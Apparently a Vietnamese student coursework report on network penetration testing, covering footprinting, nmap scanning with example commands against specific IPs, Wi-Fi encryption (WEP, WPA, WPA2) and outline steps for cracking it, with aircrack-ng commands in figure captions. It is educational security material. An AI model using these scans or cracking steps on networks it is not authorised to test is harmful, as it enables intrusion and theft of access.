You are on page 1of 44

HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG

KHOA CÔNG NGHỆ THÔNG TIN I


-----🙞🙜🕮🙞🙜-----

                                                                        
BÀI TẬP LỚN
KIỂM THỬ XÂM NHẬP MẠNG - NHÓM 1

Giảng viên: Nguyễn Ngọc Điệp

Nhóm trưởng Nhóm Trần Quốc Định       - B17DCAT038

11: Trần Đức Anh          - B17DCAT015

Thành viên Nhóm 11: Nguyễn Hoàng Đức - B17DCAT046

Phạm Tuấn Nam      - B17DCAT134

Nguyễn Như Thuần - B17DCAT178

Hà Nội, 2021

1
MỤC LỤC
LỜI MỞ ĐẦU................................................................................................................................5
I. FOOTPRINTING......................................................................................................................6
1. Sơ lược về công nghệ.............................................................................................................6
2. Phương pháp Footprinting...................................................................................................6
2.1. Footprinting qua các công cụ tìm kiếm........................................................................7
2.2. Footprinting sử dụng tính năng tìm kiếm nâng cao của Google................................7
2.3. Footprinting qua các mạng xã hội.................................................................................8
2.4. Footprinting qua các website của đối tượng................................................................8
2.5. Footprinting qua Email..................................................................................................9
2.6. Footprinting bằng WHOIS............................................................................................9
2.7. Footprinting qua DNS..................................................................................................10
2.8. Footprinting qua mạng máy tính................................................................................10
2.9. Footprinting bằng Social Engineering........................................................................11
3. Kết quả thu được.................................................................................................................11
II. SCANNING.............................................................................................................................12
1. Sơ lược về công nghệ...........................................................................................................12
2. Sử dụng nmap cho mạng cục bộ.........................................................................................13
3. Sử dụng nmap cho các mạng từ xa....................................................................................14
III. LẤY CẮP DỮ LIỆU MẠNG KHÔNG DÂY.....................................................................16
1. Khái niệm không dây...........................................................................................................16
1.1. Mạng không dây...........................................................................................................16
1.2. Ưu nhược điểm của mạng không dây.........................................................................16
1.3. Mã hóa mạng không dây..............................................................................................16
1.4. Các thuật ngữ không dây.............................................................................................17
1.5. Công nghệ Wi-Fi...........................................................................................................20
2. Mã hóa không dây...............................................................................................................24
2.1. Mã hóa WEP.................................................................................................................24
2.2. Mã hóa WPA.................................................................................................................25
2.3. Mã hóa WPA2...............................................................................................................27
3. Mối đe dọa không dây.........................................................................................................29
3.1. Các cuộc tấn công kiểm soát truy cập.........................................................................29

2
3.2. Các cuộc tấn công về tính toàn vẹn và bảo mật.........................................................29
3.3. Các cuộc tấn công sẵn có..............................................................................................29
3.4. Các cuộc tấn công xác thực..........................................................................................29
3.5. Tấn công điểm truy cập giả mạo.................................................................................29
3.6. Liên kết sai với khách hàng.........................................................................................29
3.7. Tấn công điểm truy cập bị cấu hình sai......................................................................29
3.8. Hiệp hội trái phép.........................................................................................................29
3.9. Tấn công kết nối Ad Hoc..............................................................................................30
3.10. Jamming Signal Attack..............................................................................................30
3.11. Hạn chế về khả năng quản trị....................................................................................30
3.12. Khả năng mã hóa dữ liệu...........................................................................................30
3.13. Xác thực quyền người dùng.......................................................................................30
4. Phương pháp hack không dây............................................................................................31
4.1. Khám phá Wi-Fi...........................................................................................................31
4.2. Ánh xạ GPS...................................................................................................................31
4.3. Phân tích lưu lượng không dây...................................................................................31
4.4. Khởi động các cuộc tấn công không dây....................................................................31
5. Công cụ bảo mật không dây...............................................................................................32
5.1. Hệ thống ngăn chặn xâm nhập không dây.................................................................32
5.2. Công cụ kiểm tra bảo mật Wi-Fi.................................................................................32
IV. DEMO CRACK PASSWORD WIFI BẰNG AIRCRACK-NG........................................33
1. Bật chế độ Monitor ở card Wifi..........................................................................................33
2. Hack mật khẩu Wifi bằng Aircrack-ng.............................................................................34
V. NGUỒN THAM KHẢO.........................................................................................................40

3
MỤC LỤC HÌNH ẢNH

Hình 1: Thông tin về Apple.............................................................................................................7


Hình 2: Chức năng tìm kiếm nâng cao...........................................................................................7
Hình 3: Thông tin một người trên MXH.........................................................................................8
Hình 4: Thu thập thông tin password trên Shodan.io......................................................................8
Hình 5: Thu thập thông tin sử dụng emailTrackerPro.....................................................................9
Hình 6: Sử dụng Whois để thu thập thông tin trang web Apple.com..............................................9
Hình 7: Thông tin DNS của apple.com.........................................................................................10
Hình 8: Sử dụng tracert để tìm thông tin con đường đến example.com........................................10
Hình 9: Sử dụng lệnh “nmap -F (địa chỉ IP)”................................................................................13
Hình 10: Sử dụng nmap cho các mạng từ xa.................................................................................14
Hình 11: Sử dụng lệnh “nmap -sT (địa chỉ IP mục tiêu)”.............................................................15
Hình 12: Sử dụng lệnh “nmap -sT (địa chỉ IP mục tiêu) -p25-150”..............................................15
Hình 13: Sử dụng lệnh “nmap (địa chỉ IP mục tiêu) -p80”...........................................................15
Hình 14: Mở rộng cho mạng có dây..............................................................................................18
Hình 15: Nhiều điểm truy cập.......................................................................................................18
Hình 16: Điểm phát sóng 3G/4G...................................................................................................19
Hình 17: Các tiêu chuẩn không dây...............................................................................................19
Hình 18: Mở xác thực....................................................................................................................20
Hình 19: Xác thực khóa chia sẻ.....................................................................................................21
Hình 20: Luồng xác thực 802.1x –EAP không dây.......................................................................22
Hình 21: Các biểu tượng Wi-Fi.....................................................................................................23
Hình 22: Hoạt động của mã hóa WEP...........................................................................................24
Hình 23: Hoạt động của mã hóa WPA..........................................................................................26
Hình 24: So sánh các giao thức mã hóa 802.11.............................................................................27
Hình 25: Quá trình bắt tay 4 bước.................................................................................................27
Hình 26: Mô hình các cuộc tấn công không dây...........................................................................31
Hình 27: Bật chế độ Monitor ở card Wifi......................................................................................33
Hình 28: Kết quả............................................................................................................................34
Hình 29: Kiểm tra và loại bỏ xung đột..........................................................................................34
Hình 30: Kiểm tra giao diện mạng không dây đang dùng.............................................................35
Hình 31: Mạng không dây hiện tại là wlan0..................................................................................35
Hình 32: Phát hiện các mạng không dây.......................................................................................36
Hình 33: sudo airodump-ng -w hack1 -c 11 -bssid 0C:4B:54:9F:74:9E wlan0............................36
Hình 34: BSSID, ESSID và các tín hiệu đang được truyền đi.....................................................37
Hình 35: Ngắt kết nối các thiết bị đang kết nối mạng không dây.................................................38
Hình 36: Tệp hack.........................................................................................................................38
Hình 37: sudo aircrack-ng hack1-02.cap -w /home/nguyenhoangduc-b17dcat015/password.txt. 39
Hình 38: Dò thành công mật khẩu.................................................................................................39

4
LỜI MỞ ĐẦU

Mạng không dây là công nghệ phổ biến và thông dụng nhất trong xã hội
hiện nay, mạng có dây đã và đang dần bị thay thế bởi mạng không dây vì tính dễ
dàng và di động của nó. Sử dụng mạng không dây không chỉ tăng tính di dộng
trong mạng mà còn tăng tính linh hoạt cho người dùng. Trong thời kỳ đầu của công
nghệ không dây, mạng không dây được cho là không đủ an toàn để bào vệ thông
tin. Tuy nhiên, nhiều kỹ thuật mã hóa đã được sử dụng để bảo mật các kênh thông
tin liên lạc không dây.

5
I. FOOTPRINTING

1. Sơ lược về công nghệ


Footprinting là việc thu thập mọi thông tin có thể có liên quan đến mạng mục tiêu và
mạng đích. Việc thu thập thông tin này giúp xác định các cách có thể khác nhau để xâm nhập
vào mạng mục tiêu.
Những thông tin này có thể được thu thập từ thông tin cá nhân công khai và thông tin
nhạy cảm từ bất kỳ nguồn bí mật nào. Thông thường, thu thập thông tin và do thám sẽ thực hiện
các cuộc tấn công Social Engineering, tấn công hệ thống hoặc mạng, hoặc bất kỳ kỹ thuật nào
khác.

2. Phương pháp Footprinting


- Footprinting qua các công cụ tìm kiếm
- Footprinting sử dụng tính năng tìm kiếm nâng cao của Google
- Footprinting qua các mạng xã hội
- Footprinting qua các website của đối tượng
- Footprinting qua Email
- Footprinting bằng WHOIS
- Footprinting qua DNS
- Footprinting qua mạng máy tính
- Footprinting bằng Social Engineering

6
2.1. Footprinting qua các công cụ tìm kiếm
Thao tác cơ bản nhất và cũng rất hiệu quả là thu thập thông tin thông qua công cụ
tìm kiếm. Công cụ tìm kiếm trích xuất thông tin về một chủ thể bạn tìm kiếm trên
internet. Bạn có thể sử dụng bất kỳ công cụ tìm kiếm nào trên trình duyệt như Google
hoặc Bing, tìm kiếm bất kỳ tổ chức nào. Kết quả thu thập mọi thông tin có sẵn trên
Internet.

Hình 1: Thông tin về Apple

2.2. Footprinting sử dụng tính năng tìm kiếm nâng cao của Google
Một số tùy chọn nâng cao có thể được sử dụng để tìm kiếm một chủ đề cụ thể
bằng các công cụ tìm kiếm. Các công cụ tìm kiếm nâng cao này làm cho việc tìm kiếm
trở nên thích hợp hơn và tập trung vào một chủ đề nhất định.

7
Hình 2: Chức năng tìm kiếm nâng cao

2.3. Footprinting qua các mạng xã hội

Hình 3: Thông tin một người trên MXH

2.4. Footprinting qua các website của đối tượng


Các thông tin có thể được thu thập bằng dịch vụ trực tuyến như đã xác định trước
đó như netcraft.com hoặc bằng cách sử dụng phần mềm như Burp Suite, Zaproxy,
Website Informer, Firebug,…. Những công cụ này có thể mang lại thông tin như loại kết
nối, trạng thái và thông tin sửa đổi cuối cùng. Bằng cách lấy những loại thông tin này, kẻ
tấn công có thể kiểm tra mã nguồn, thông tin chi tiết của nhà phát triển, cấu trúc hệ thống
tệp và tập lệnh.

8
Hình 4: Thu thập thông tin password trên Shodan.io

2.5. Footprinting qua Email


Email đóng một vai trò quan trọng trong việc điều hành hoạt động kinh doanh của
một tổ chức. Email là một trong những cách giao tiếp chuyên nghiệp phổ biến nhất, được
sử dụng rộng rãi và được mọi người sử dụng trong các cơ quan. Giao tiếp với các đối tác,
nhân viên, đối thủ cạnh tranh, nhà thầu và bất cứ ai khác có liên quan đến việc điều hành
một tổ chức. Nội dung hoặc nội dung của Do đó, email rất quan trọng, cực kỳ có giá trị
đối với những kẻ tấn công.

Hình 5: Thu thập thông tin sử dụng emailTrackerPro

9
2.6. Footprinting bằng WHOIS
WHOIS giúp thu thập thông tin liên quan đến tên miền, thông tin về quyền sở
hữu, địa chỉ IP, dữ liệu Netblock và các thông tin khác. Tra cứu WHOIS giúp tìm ra cơ
sở đứng sau tên miền mục tiêu.

Hình 6: Sử dụng Whois để thu thập thông tin trang web Apple.com

2.7. Footprinting qua DNS


Thông tin tra cứu DNS rất hữu ích để xác định máy chủ lưu trữ trong mạng được
nhắm đến. Có một số công cụ có sẵn trên internet thực hiện tra cứu DNS.

Hình 7: Thông tin DNS của apple.com

10
2.8. Footprinting qua mạng máy tính
Một trong những cách thu thập thông tin quan trọng là thông qua mạng máy tính.
Có một số công cụ có sẵn có thể được sử dụng để in ra thông tin mạng máy tính nhằm thu
thập thông tin về mạng mục tiêu.

Hình 8: Sử dụng tracert để tìm thông tin con đường đến example.com

2.9. Footprinting bằng Social Engineering


Việc thu thập thông tin bằng Social Engineering cũng khá hữu ích. Nó giúp thu
thập thông tin về cá nhân, thông tin đăng nhập hay nhạy cảm thông qua các Social
Engineering đơn giản. Một số kỹ thuật Social Engineering cơ bản là:
- Eavesdropping
- Phishing
- Shoulder Surfing
- Dumpster Diving

3. Kết quả thu được


Sau khi Footprinting ta thu được kết quả:
- Thông tin cơ bản của website và doanh nghiệp, tổ chức.
- Thông tin về website như: IP, dải IP,…
- Thông tin cơ bản về vị trí địa lý, cấu trúc cơ bản cũng như thư mục của website
- Thông tin cơ bản về mạng, DNS,…

11
II. SCANNING

1. Sơ lược về công nghệ


Sau giai đoạn Footprinting, ta có thể có đủ thông tin về mục tiêu. Scanning yêu cầu một
số thông tin để tiến hành thêm. Scanning là một phương pháp lấy thông tin mạng như xác định
máy chủ, cổng thông tin và dịch vụ bằng cách quét mạng và cổng. Mục tiêu chính của Scanning
là:
- Xác định các máy chủ trực tiếp trên mạng
- Xác định các cổng mở và đóng
- Xác định thông tin hệ điều hành
- Xác định các dịch vụ đang chạy trên mạng
- Xác định các quy trình đang chạy trên mạng
- Xác định sự hiện diện của thiết bị bảo mật
- Xác định kiến trúc hệ thống
- Xác định các dịch vụ đang chạy
- Xác định các lỗ hổng

12
2. Sử dụng nmap cho mạng cục bộ
Chạy quét Nmap thường là cách tốt nhất để khám phá quy mô của mạng và số lượng thiết
bị được kết nối với nó. Chạy quét Nmap (-F) nhanh trên phạm vi mạng có thể tạo ra danh sách
tất cả các địa chỉ IP thuộc các máy chủ đang hoạt động trên mạng, cùng với một số thông tin bổ
sung.

13
Hình 9: Sử dụng lệnh “nmap -F (địa chỉ IP)”

3. Sử dụng nmap cho các mạng từ xa


Ngoài chức năng quét mạng cục bộ, Nmap có thể chạy trên 1 website, Nmap sẽ phân tích
cú pháp và truy xuất địa chỉ IP được liên kết với miền website đó.

14
Sau khi lấy địa chỉ IP và ghi lại số cổng đang mở, các lần quét Nmap nữa có thể tiết lộ hệ
điều hành đang được sử dụng để lưu trữ một website từ xa:
Sudo nmap –O 118.68.218.45
Cuối cùng, có thể tìm hiểu về các phiên bản phần mềm trên các cổng đang mở:
Sudo nmap – sV 118.68.218.45
Những thông tin này kết hợp với nhau sẽ trở thành thông tin cần thiết để bắt đầu tấn công
các thiết bị trên mạng.

Hình 10: Sử dụng nmap cho các mạng từ xa

Quét tất cả các cổng TCP đang mở trên máy mục tiêu và dịch vụ mặc định cho cổng đó:
Nmap –sT 192.168.1.7

15
Hình 11: Sử dụng lệnh “nmap -sT (địa chỉ IP mục tiêu)”

Quét cổng cụ thể hoặc giải cổng:


Sudo nmap –sT 192.168.1.7 –p25-150

Hình 12: Sử dụng lệnh “nmap -sT (địa chỉ IP mục tiêu) -p25-150”

Quét mạng con:


Nmap 192.167.1.7/24 –p80

Hình 13: Sử dụng lệnh “nmap (địa chỉ IP mục tiêu) -p80”

16
III. LẤY CẮP DỮ LIỆU MẠNG KHÔNG DÂY

1. Khái niệm không dây


1.1. Mạng không dây
Mạng không dây là một loại mạng lưới máy tính có khả năng truyền và nhận dữ liệu
thông qua một phương tiện không dây sử dụng sóng vô tuyến. Lợi thế chính của mạng này là
giảm chi phí của dây dẫn, thiết bị và sự phức tạp của kết nối mạng có dây. Các dải tần số khác
nhau sẽ được sử dụng cho từng công nghệ không dây khác nhau tùy thuộc vào các yêu cầu. Ví
dụ phổ biến nhất về mạng không dây là mạng điện thoại đi động, truyền thông qua vệ tinh,…

1.2. Ưu nhược điểm của mạng không dây


- Ưu điểm:
 Việc cài đặt nhanh gọn, dễ dàng và không phải lắp ráp xuyên qua tường hay trần nhà.
 Mạng không dây dễ dàng kết nối những nơi mà khó cho việc kéo dây cáp như vùng
núi, vùng sâu, hải đảo.
 Truy cập ở mọi nơi trong phạm vi của mạng.
 Thiết bị di động tư do di chuyển mà vẫn kết nối mạng.
 Cài đặt nhanh chóng không tốn chi phí thời gian cho cáp kết nối.
 dễ dàng mở rộng các kết nối mạng.
 Có thể kết nối với internet thông qua mạng không dây cục bộ ngay tại các địa điểm
công cộng như sân bay, thư viện, trường học hoặc quán cafe.
- Nhược điểm:
 Vấn đề bảo mật đưa ra là rất lớn, và khó có thể đạt được những kỳ vọng.
 số lượng máy tính trong mạng tăng lên sẽ làm cho băng thông giảm, truy cập mạng
chậm.
 tiêu chuẩn mạng thay đổi trong khi các điểm truy cập không có sự thay đổi sẽ tạo lỗi
khi truyền dữ liệu.
 một số thiết bị điện tử có thể làm nhiễu mạng.

1.3. Mã hóa mạng không dây


- Có nhiều loại mã hóa mạng không dây: WEP, WAP, WAP2, TKIP, AES, EAP, LEAP,
RADIUS, 802.11i, CCMP.
- Trong bài báo cáo này nhóm chúng em sẽ trình bày sơ lược về 3 loại mã hóa mạng không
dây: WEP, WPA, WPA2.

17
1.4. Các thuật ngữ không dây
1.4.1. GMS
Global System for Mobile Communication (GMS) là một chuẩn của Viện Tiêu chuẩn
Viễn thông Châu Âu. Nó là một giao thức thế hệ thứ 2 (2G) cho kỹ thuật số mạng di động. 2G
được phát triển để thay thế 1G. Công nghệ này đã được thay thế bằng chuẩn 3G UMTS, sau đấy
là chuẩn 4G LTE. Mạng GMS hoạt động chủ yếu ở dải tần số 900 MHz đến 1800 MHz.
1.4.2. Điểm truy cập
Trong mạng không dây, điểm truy cập (AP) hoặc điểm truy cập không dây (WAP) là một
thiết bị phần cứng cho phép kết nối không dây tới các thiết bị đầu cuối. Điểm truy cập có thể
được tích hợp với một bộ định tuyến hoặc là một thiết bị riêng biệt được kết nối với bộ định
tuyến.
1.4.3. SSID
Service Set Identifier (SSID) là tên của một điểm truy cập.
1.4.4. BSSID
Địa chỉ MAC của một điểm truy cập.
1.4.5. Băng tần ISM
Băng tần ISM là băng tần vô tuyến dành cho mục đích công nghiệp, khoa học và y tế. Dải
tần số 2.54 GHz được sử dụng riêng cho ISM.
1.4.6. Orthogonal Frequency Division Multiplexing (OFDM)
Là một phương pháp mã hóa kỹ thuật số trên nhiều tần số song mang. Nó dược sử dụng
trong TV kỹ thuật số, phát sóng âm thanh, mạng DSL và giao tiếp 4G.
1.4.7. Frequency-hopping Spread Spectrum (FHSS)
Là một kỹ thuật truyền tín hiệu vô tuyến bằng cách chuyển đổi hoặc nhảy sóng mang của
các tần số khác nhau.
1.4.8. Các loại mạng không dây
Các loại mạng không dây được triển khai trong một khu vực địa lý có thể được phân loại
như sau:
 Mạng khu vực cá nhân không dây (PAN)
 Mạng cục bộ không dây (WLAN)
 Mạng khu vực đô thị không dây (WMAN)
 Mạng diện rộng không dây (WWAN)
Tuy nhiên, một mạng không dây có thể được xác định thành các loại khác nhau tùy thuộc
vào các kịch bản triển khai. Sau đây là một số kiểu mạng không dây được sử dụng trong các
trường hợp khác nhau:

18
 Mở rộng cho mạng có dây

Hình 14: Mở rộng cho mạng có dây

 Nhiều điểm truy cập

19
Hình 15: Nhiều điểm truy cập

 Điểm phát sóng 3G/4G

Hình 16: Điểm phát sóng 3G/4G

 Các tiêu chuẩn không dây

20
Hình 17: Các tiêu chuẩn không dây

1.4.9. Service Set Identifier (SSID)


Mã định danh nhóm dịch vụ (SSID) là tên của một điểm truy cập. Về mặt kỹ thuật, SSID
được sử dụng để xác định mạng 802.11 (Wi-Fi) 32 byte. Mạng Wi-Fi phát liên tục SSID (nếu
được bật). Việc phát sóng này cơ bản nhằm mục đích để xác định và hiện diện của mạng không
dây. Nếu truyền phát SSID bị tắt, các thiết bị không dây sẽ không tìm thấy mạng không dây trừ
khi chúng được định cấu hình với SSID theo cách thủ công bằng cách truy cập từng thiết bị. Các
tham số mặc định như SSID mặc định và mật khẩu phải được thay đổi để tránh bị xâm phạm.

1.5. Công nghệ Wi-Fi


Wi-Fi là công nghệ mạng cục bộ không dây theo tiêu chuẩn 802.11. Nhiều thiết bị như
máy tính cá nhân, máy chơi game, điện thoại di động, máy tính bảng, máy in và nhiều thiết bị
khác tương thích với Wi-Fi. Các thiết bị tương thích với Wi-Fi này được kết nối với internet
thông qua điểm truy cập không dây.
1.5.1. Chế độ xác thực Wi-Fi
Có hai chế độ xác thực cơ bản trong các mạng Wi-Fi:
 Mở xác thực

Hình 18: Mở xác thực

21
Quy trình xác thực hệ thống mở yêu cầu sáu bước giữa máy khách và người phản hồi để
hoàn tất quá trình xác thực:
o Trong mạng LAN dựa trên Wi-Fi, khi một máy khách không dây đang cố gắng kết
nối thông qua Wi-Fi, nó bắt đầu quá trình liên kết bằng cách gửi yêu cầu thăm dò.
Yêu cầu thăm dò này là để khám phá mạng 802.11. Yêu cầu thăm dò này chứa thông
tin tốc độ dữ liệu được hỗ trợ của khách hàng.
o Yêu cầu thăm dò này từ khách hàng được trả lời với một phản hồi có chứa các tham
số như SSID, tốc độ dữ liệu, mã hóa,… nếu điểm truy cập tìm thấy tốc độ dữ liệu
được hỗ trợ tương thích, mã hóa và một tham số khác với máy khách.
o Máy khách gửi một yêu cầu xác thực mở (khung xác thực) đến điểm truy cập với
chuỗi 0x0001 để mở xác thực.
o Yêu cầu xác thực mở được trả lời bởi điểm truy cập với phản hồi có dãy 0x0002.

o Sau khi nhận được phản hồi xác thực hệ thống mở, máy khách gửi liên kết yêu cầu
với các tham số bảo mật cũng như mã hóa đã chọn cho điểm truy cập.
o Điểm truy cập phản hồi với yêu cầu hoàn tất quá trình liên kết và khách hàng có thể
bắt đầu gửi dữ liệu.
 Xác thực khóa chia sẻ

Hình 19: Xác thực khóa chia sẻ

Chế độ xác thực khóa chia sẻ yêu cầu bốn bước để hoàn tất quá trình xác thực:
o Bước đầu tiên là yêu cầu xác thực ban đầu được khách hàng gửi đến người phản hồi
hoặc điểm truy cập.
o Điểm truy cập phản hồi yêu cầu xác thực bằng văn bản thách thức.
o Máy khách sẽ mã hóa văn bản bằng khóa bí mật được chia sẻ và gửi lại cho người
phản hồi.

22
o Người phản hồi giải mã văn bản bằng khóa bí mật được chia sẻ. Nếu được bản rõ
trùng với văn bản thách thức, phản hồi xác thực thành công sẽ được gửi đến máy
khách.
1.5.2. Xác thực Wi-Fi với máy chủ xác thực tập trung
Ngày nay, công nghệ cơ bản của mạng WLAN được triển khai phổ biến và rộng rãi và
IEEE 802.11 vẫn đang được sử dụng trên toàn thế giới. Tùy chọn xác thực cho IEEE 802.11 là
cơ chế xác thực khoá chia sẻ hoặc WEP (Wired Equivalency Privacy). Một tùy chọn khác là mở
xác thực.
Hai cơ chế xác thực mở và xác thực khóa chia sẻ không thể bảo mật hiệu quả vì cần có
khóa WEP và trong xác thực khóa chia sẻ, văn bản thách thức được chuyển tiếp đến khách hàng
có thể bị hacker phát hiện cùng với các gói tin được mã hóa.
IEEE 802.1x được triển khai với Extensible Authentication Protocol (EAP) làm giải pháp
bảo mật WLAN. Các thành phần chính mà giải pháp bảo mật WLAN nâng cao IEEE 802.1x với
EAP phụ thuộc là:
 Xác thực: Quy trình xác thực lẫn nhau giữa người dùng cuối và máy chủ xác thực
RADIUS, thường là ISE hoặc ACS.
 Mã hóa: Các khóa mã hóa được cấp phát động sau quá trình xác thực.
 Chính sách trung tâm: Cung cấp sự quản lý và kiểm soát quá trình xác thực lại, thời
gian chờ phiên, khóa tái tạo và mã hóa,…

23
1.5.3. Luồng xác thực 802.1x –EAP không dây

Hình 20: Luồng xác thực 802.1x –EAP không dây

A. Trong hình trên, người dùng không dây với bộ hỗ trợ EAP kết nối mạng để truy cập các tài
nguyên thông qua điểm truy cập.
B. Khi nó kết nối và liên kết xuất hiện, điểm truy cập sẽ chặn tất cả lưu lượng truy cập từ thiết bị
được kết nối gần đây cho đến khi người dùng đăng nhập vào mạng.
C. Người dùng với EAP cung cấp thông tin đăng nhập thường là tên người dùng và mật khẩu,
các thông tin đăng nhập này được xác thực bởi máy chủ xác thực RADIUS.
D. Xác thực lẫn nhau thực hiện tại điểm D và E giữa xác thực máy chủ và máy khách. Đây là quá
trình xác thực hai giai đoạn. Ở giai đoạn đầu, máy chủ xác thực người dùng.
E. Ở giai đoạn thứ hai, người dùng xác thực máy chủ hoặc ngược lại.
F. Sau quá trình xác thực lẫn nhau, việc xác định khóa WEP lẫn nhau giữa máy chủ và máy
khách được thực hiện. Máy khách sẽ lưu khóa phiên này.
G. Máy chủ xác thực RADIUS gửi khóa phiên này đến điểm truy cập.
H. Cuối cùng, điểm truy cập bây giờ mã hóa khóa Broadcast bằng khóa phiên và gửi khóa đã mã
hóa cho máy khách.
I. Máy khách đã có khóa phiên. Giờ đây, Khách hàng có thể giao tiếp với điểm truy cập bằng
cách sử dụng các khóa phiên và khóa Broadcast.

24
1.5.4. Wi-Fi Chalking
Wi-Fi Chalking bao gồm một số phương pháp để phát hiện các mạng không dây đang
mở. Các kỹ thuật này bao gồm:
 WarWalking: Đi bộ xung quanh để phát hiện các mạng Wi-Fi đang mở
 WarChalking: Sử dụng biểu tượng và dấu hiệu để quảng cáo mạng Wi-Fi mở
 WarFlying: Phát hiện các mạng Wi-Fi đang mở bằng Drone
 WarDriving: Lái xe xung quanh để phát hiện các mạng Wi-Fi đang mở

Hình 21: Các biểu tượng Wi-Fi

25
2. Mã hóa không dây
2.1. Mã hóa WEP
Wired Equivalent Privacy (WEP) là một giao thức mã hóa lâu đời nhất và yếu nhất. Nó
đã được phát triển để đảm bảo tính bảo mật của các giao thức không dây, tuy nhiên nó rất dễ bị
tấn công. Nó sử dụng vectơ khởi tạo 24-bit (IV) để tạo mật mã dòng RC4 với Cyclic Redundant
Check (CRC) để đảm bảo tính bí mật và toàn vẹn. WEP chuẩn 64-bit sử dụng khóa 40-bit, WEP
128-bit sử dụng khóa 104-bit và WEP 256-bit sử dụng khóa 232-bit. Xác thực được sử dụng với
WEP là xác thực hệ thống mở và xác thực khóa chia sẻ.
2.1.1. Hoạt động của mã hóa WEP
Véctơ khởi tạo (IV) và khoá được gọi là hạt giống WEP. Hạt giống WEP thường được sử
dụng từ khóa RC4. RC4 tạo ra một dòng bit giả ngẫu nhiên. Luồng giả ngẫu nhiên này được
XOR với bản rõ để mã hóa dữ liệu. CRC-32 Checksum được sử dụng để tính toán Integrity
Check Value (ICV).

Hình 22: Hoạt động của mã hóa WEP

2.1.2. Vectơ khởi tạo yếu (IV)


Một trong những vấn đề lớn với WEP là với Véctơ khởi tạo (IV). Giá trị IV quá nhỏ để
bảo vệ khỏi việc sử dụng và phát lại. IV yếu tiết lộ thông tin. WEP không cung cấp tích hợp để
cập nhật khóa.
2.1.3. Lỗ hổng và cách tấn công
- Khóa bảo mật có chiều dài 64-bit điều này sẽ dễ dàng cho các hacker sử dụng biện pháp
tấn công vét cạn để tìm ra khóa.
- Mã hóa sử dụng thuật toán mã hóa dòng RC4, vì vậy cần đảm bảo cho các dữ liệu giống
nhau. Chính vì vậy một giá trị IV (véctơ khởi tạo) được sinh ra ngẫu nhiên và cộng thêm
vào với khóa để tạo ra các khóa khác nhau cho mỗi lần mã hóa. Do giá trị IV không được
giải mã hóa và đặt trong header của gói dữ liệu, nên bất cứ ai lấy được dữ liệu trên mạng

26
đều có thể thấy được. Với các giá trị IV được sử dụng với cùng một khóa trên một gói dữ
liệu mã hóa, hacker có thể bắt gói dữ liệu cà tìm ra khóa WEP.
2.1.4. Phá vỡ mã hóa WEP
Việc phá vỡ mã hóa WEP có thể được thực hiện bằng cách làm theo các bước sau:
1. Giám sát kênh điểm truy cập.
2. Kiểm tra khả năng tiêm vào điểm truy cập.
3. Sử dụng công cụ để xác thực giả mạo.
4. Đánh hơi các gói tin bằng công cụ Wi-Fi Sniffing.
5. Sử dụng công cụ mã hóa để đưa các gói đã được mã hóa vào.
6. Sử dụng công cụ Crack để trích xuất khóa mã hóa từ IV.

2.2. Mã hóa WPA


Truy cập được bảo vệ bằng Wi-Fi (WPA) là một kỹ thuật mã hóa dữ liệu khác phổ biến
được sử dụng cho mạng WLAN dựa trên tiêu chuẩn 802.11i. Giao thức bảo mật này được phát
triển bởi Wi-Fi Alliance để bảo mật mạng WLAN như một giải pháp cho điểm yếu và lỗ hổng
bảo mật tìm thấy trong WEP. Triển khai WPA yêu cầu chương trình cơ sở nâng cấp cho các thẻ
giao diện mạng không dây được thiết kế cho WEP. Temporal Key Integrity Protocol (TKIP) đảm
bảo cho mỗi khóa gói tin bằng cách tạo động một khóa mới cho mỗi gói 128-bit để ngăn chặn
mối đe dọa dễ bị tấn công bởi WEP. WPA cũng chứa Kiểm tra tính toàn vẹn của thông báo như
một giải pháp của Kiểm tra dự phòng theo chu kỳ (CRC) được giới thiệu trong WEP để khắc
phục lỗ hổng xác thực tính toàn vẹn mạnh mẽ.
2.2.1. Giao thức về tính toàn vẹn Key Temporal
Giao thức toàn vẹn khóa tạm thời (TKIP) là một giao thức được sử dụng trong mạng lưới
không dây IEEE 802.11i. Giao thức này được sử dụng trong Wi-Fi Protected Access (WPA).
TKIP giới thiệu ba tính năng bảo mật:
1. Khoá gốc bí mật và Vector khởi tạo (IV) trộn trước RC4.
2. Bộ đếm trình tự để đảm bảo nhận theo thứ tự và ngăn chặn các cuộc tấn công phát lại.
3. Kiểm tra tính toàn vẹn của tin nhắn 64-bit (MIC).

27
2.2.2. Hoạt động của mã hóa WPA

Hình 23: Hoạt động của mã hóa WPA

1. Khóa mã hóa tạm thời, địa chỉ truyền và số thứ tự TKIP được trộn đầu tiê để tạo hạt giống
WEP trước khi đầu vào cho thuật toán RC4.
2. Hạt giống WEP được đưa vào thuật toán RC4 để tạo khóa dòng.
3. Đơn vị dữ liệu dịch vụ MAC (MSDU) và kiểm tra tính toàn vẹn của tin nhắn (MIC) được kết
hợp sử dụng Thuật toán Michael.
4. Kết quả của thuật toán Michael được phân mảnh để tạo dữ liệu giao thức MAC (MPDU).
5. Giá trị kiểm tra tính toàn vẹn (ICV) 32-bit được tính cho MPDU.
6. Sự kết hợp của MPDU và ICV được XOR với khóa dòng được tạo ở bước thứ hai để tạo ra
Ciphertext.

28
2.3. Mã hóa WPA2
WPA2 được thiết kế để khắc phục và thay thế WPA, bảo mật tốt hơn sử dụng mã hóa
192-bit và mã hóa riêng lẻ cho từng người dùng để làm cho nó phức tạp và khó thỏa hiệp hơn.
Nó sử dụng Counter Mode Cipher Block Chaining Giao thức mã xác thực tin nhắn (CCMP) và
tiêu chuẩn mã hóa nâng cao (AES) dựa trên mã hóa. Wi-Fi Allowance cũng giới thiệu giao thức
bảo mật tiếp theo WPA3 trong năm 2018 để vượt qua WPA2 với các khả năng và bảo mật bổ
sung. WPA2-Personal yêu cầu mật khẩu (Khóa chia sẻ trước) để bảo vệ mạng khỏi truy cập trái
phép. Trong chế độ này, mỗi thiết bị không dây đang mã hóa lưu lượng bằng Khóa dẫn xuất 128-
bit từ cụm mật khẩu gồm 8 đến 63 ký tự ASCII. WPA2-Enterprise bao gồm EAP hoặc RADIUS
cho cơ chế xác thực tập trung. Sử dụng cái này xác thực tập trung với các cơ chế xác thực bổ
sung như Kerberos và chứng chỉ, mạng không dây có thể an toàn hơn.

Hình 24: So sánh các giao thức mã hóa 802.11

2.3.1. Phá vỡ mã hóa WPA


1. Brute Force mật khẩu người dùng định nghĩa WPA PSK bằng cách tấn công từ điển.
2. Chụp các gói tin bắt tay xác thực của WPA/WPA2 để bẻ khóa chìa khóa ngoại tuyến WPA.
